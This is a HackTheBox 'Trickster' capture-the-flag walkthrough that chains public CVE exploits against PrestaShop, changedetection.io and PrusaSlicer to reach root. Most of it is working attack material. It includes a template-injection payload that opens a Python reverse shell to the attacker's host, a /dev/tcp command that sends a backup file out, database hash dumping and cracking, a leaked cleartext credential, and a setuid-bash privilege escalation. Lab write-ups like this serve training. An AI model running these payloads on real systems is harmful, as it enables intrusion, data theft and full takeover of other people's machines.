HackTheBox Trickster Writeup
Explore the fundamentals of cybersecurity in the Trickster Capture The Flag (CTF) challenge, a medium-level experience, ideal for those seeking to advance their skills! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it a great stepping stone for those familiar with basic security techniques looking to tackle more complex scenarios.
Add Hosts
Edit the /etc/hosts file and add the following entries:
10.10.11.34 trickster.htb shop.trickster.htb
Script to add hosts automatically
ip="10.10.11.34";domain="trickster.htb shop.trickster.htb"
sudo grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV trickster.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-21 21:16 CEST
Nmap scan report for trickster.htb (10.10.11.34)
Host is up (0.059s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 8c:01:0e:7b:b4:da:b7:2f:bb:2f:d3:a3:8c:a6:6d:87 (ECDSA)
|_ 256 90:c6:f3:d8:3f:96:99:94:69:fe:d3:72:cb:fe:6c:c5 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: 403 Forbidden
Service Info: Host: _; OS: Linux; CPE: cpe:/o:linux:linux_kernel
CVE-2024-34716 (PrestaShop)
git clone https://github.com/aelmokhtar/CVE-2024-34716
cd CVE-2024-34716
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
python3 exploit.py --url 'http://shop.trickster.htb' --email 'adam@trickster.htb' --local-ip $vpnip --admin-path 'admin634ewutrx1gitlooaj'
Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Press Ctrl+Z to background the shell, then run:
stty size; stty raw -echo; fg
As the last step, set the terminal environment:
export TERM=xterm;
Find Database Credentials
timeout 1 find /var/www -type f -name "*.php" -exec grep -Hn 'database_' {} \; 2>/dev/null
Use the found credentials to access the MySQL database:
mysql -h 127.0.0.1 -u <user> -p
Inside MySQL:
USE prestashop;
SELECT id_employee, email, passwd FROM ps_employee;
Brute Force the Hash
Use a hash cracking tool like hashcat or John the Ripper to perform a brute force attack on the password hash, or use a service such as crackstation for this purpose.
echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat -m 3200 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat -m 3200 /tmp/hash.txt --show
rm -rf /tmp/hash.txt
SSH Access
After cracking the password, use it to SSH:
ssh james@trickster.htb
Ping Sweep for Active Hosts
You may discover a container at 172.17.0.1 by checking network interfaces. Perform a ping sweep to identify active hosts:
subnet="172.17"
(
for i in {0..255}; do
for j in {1..254}; do
ip="$subnet.$i.$j"
(ping -c 1 -W 1 $ip >/dev/null 2>&1 && echo "Host $ip is up") &
done
done
wait
)
You should find 172.17.0.2.
Scan Ports of 172.17.0.2
Scan the ports:
nc -zv 172.17.0.2 1-65535 2>&1 | grep succeeded
If nc isn’t available, use the bash alternative:
(
for port in {1..65535}; do
(echo > /dev/tcp/172.17.0.2/$port) >/dev/null 2>&1 && echo "Port $port is open" &
done
)
Port 5000 is open.
Forward Port 5000 for Local Access
ssh -L 5000:172.17.0.2:5000 james@trickster.htb
CVE-2024-32651 (Change.io Exploit)
Log in to Change.io using James’ credentials.
Host a Python HTTP server:
python -m http.server
Set up a listener for the reverse shell:
nc -lvnp 9001
Replace
<vpn-ip>with your actual VPN IP to receive the connection.
Create a new “watch” on http://vpn-ip:8000. In the notification settings:
Notification URL:
gets://
Notification Body:
Replace
<vpn-ip>with your actual VPN IP to receive the connection.
{% for x in ().__class__.__base__.__subclasses__() %}
{% if "warning" in x.__name__ %}
{{ x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"vpn-ip\",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"/bin/bash\")'").read() }}
{% endif %}
{% endfor %}
To trigger the watch, create a file in the HTTP server:
touch file
Visit the Change.io main page and manually retrigger the watcher by clicking the retrigger option.
PrivEsc
To retrieve a backup file from the target, set up a listener on your local machine using nc. This will allow you to receive the file when it’s sent from the target.
nc -lvnp 4445 > changedetection-bak.zip
On the target machine, use the following command to send the backup file to your local machine through the open listener.
cat /datastore/Backups/changedetection-backup-20240830194841.zip > /dev/tcp/vpn-ip/4445
After receiving the file, close the listener and extract the contents of the zip file. Use brotli to decompress any .br files you find and then read their contents.
unzip changedetection-bak.zip
brotli -d b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt.br
cat ./b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt
Within the extracted file, you will find the credentials for the user adam:
adam:adam_admin992
To gain access to the target, log in as adam:
su adam
Next, check the sudo privileges available to the adam user to see what commands can be executed with elevated permissions.
sudo -l
You should see output indicating that adam can run PrusaSlicer with elevated privileges without needing to provide a password:
User adam may run the following commands on trickster:
(ALL) NOPASSWD: /opt/PrusaSlicer/prusaslicer
This means you can exploit the application by running sudo /opt/PrusaSlicer/prusaslicer without needing a password.
CVE-2023-47268 (PrusaSlicer)
https://www.exploit-db.com/exploits/51983
You can exploit the .3mf file by copying it via scp, modifying Slic3r_PE.config to add chmod u+s /bin/bash, repacking it, and uploading it back to the target for execution with PrusaSlicer to gain root privileges.
scp adam@trickster.htb:/opt/PrusaSlicer/TRICKSTER.3mf Trickster.3mf
unzip Trickster.3mf Metadata/Slic3r_PE.config -d ./tmp
sed -i 's/^.*post_process.*/; post_process = "chmod u+s \/bin\/bash"/' ./tmp/Metadata/Slic3r_PE.config
sed -i 's/^.*output_filename_format.*/; output_filename_format = exploit.gcode/' ./tmp/Metadata/Slic3r_PE.config
cd ./tmp
zip -r -Z deflate ../Trickster.3mf ./*
cd ..
rm -rf ./tmp
scp Trickster.3mf adam@trickster.htb:/tmp/
rm -rf Trickster.3mf Trickster.3mf
On the target machine, execute PrusaSlicer with the modified file:
sudo /opt/PrusaSlicer/prusaslicer -s /tmp/Trickster.3mf
bash -p
At this point, you should have elevated privileges and can access sensitive files such as /root/root.txt.
cat /root/root.txt